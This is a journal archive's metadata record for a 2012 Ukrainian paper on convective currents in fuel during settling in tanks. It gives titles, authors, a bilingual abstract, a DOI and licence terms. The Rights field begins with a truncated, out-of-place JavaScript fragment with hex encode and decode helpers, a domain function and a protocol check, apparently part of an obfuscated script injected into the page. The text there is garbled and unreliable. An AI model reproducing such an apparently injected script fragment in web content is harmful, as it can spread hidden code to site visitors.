ACCOUNT OF CONVECTIVE FLOWS ARISING IN THE FUEL DURING ITS SETTLING IN TANK
Наукові журнали Національного Авіаційного Університету
View Archive InfoField | Value | |
Title |
ACCOUNT OF CONVECTIVE FLOWS ARISING IN THE FUEL DURING ITS SETTLING IN TANK
УРАХУВАННЯ КОНВЕКТИВНИХ ПОТОКІВ, ЩО ВИНИКАЮТЬ У ПАЛИВІ ПІД ЧАС ЙОГО ВІДСТОЮВАННЯ В РЕЗЕРВУАРАХ УРАХУВАННЯ КОНВЕКТИВНИХ ПОТОКІВ, ЩО ВИНИКАЮТЬ У ПАЛИВІ ПІД ЧАС ЙОГО ВІДСТОЮВАННЯ В РЕЗЕРВУАРАХ |
|
Creator |
Пузік, С.; Національний авіаційний університет
Гвоздецький, А.; Національний авіаційний університет |
|
Subject |
convection currents; defending; fuel; tank
— відстоювання; конвективні потоки; паливо; резервуар |
|
Description |
Most simple and accessible method of purification is defended fuels, but its effectiveness depends onseveral factors. One of these factors is the impact on the share of pollution that ends up, convection currents that occur in fuel by changing its temperature in the tank. So compiled by the system of equations thatdescribes the calculation of heating fuel from the environment in land, halfdeep and deep reservoirs.
Складено систему рівнянь, яка описує розрахунок нагрівання палива від повітрянавколишнього середовища в наземних, напівзаглиблених і заглиблених резервуарах.Запропоновано методику розрахунків конвективних потоків, які виникають у паливі під часйого відстоювання при різному розташуванні резервуарівКлючові слова: відстоювання, конвективні потоки, паливо, резервуар. Складено систему рівнянь, яка описує розрахунок нагрівання палива від повітря навколишнього середовища в наземних, напівзаглиблених і заглиблених резервуарах. Запропоновано методику розрахунків конвективних потоків, які виникають у паливі під часйого відстоювання при різному розташуванні резервуарів |
|
Publisher |
National Aviation University
|
|
Contributor |
—
— — |
|
Date |
2012-04-20
|
|
Type |
—
— — |
|
Format |
application/pdf
|
|
Identifier |
http://jrnl.nau.edu.ua/index.php/visnik/article/view/128
10.18372/2306-1472.50.128 |
|
Source |
Proceedings of the National Aviation University; Том 50, № 1 (2012); 167-171
Вестник Национального авиационного университета; Том 50, № 1 (2012); 167-171 Вісник Національного Авіаційного Університету; Том 50, № 1 (2012); 167-171 |
|
Language |
uk
|
|
Rights |
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access). |
|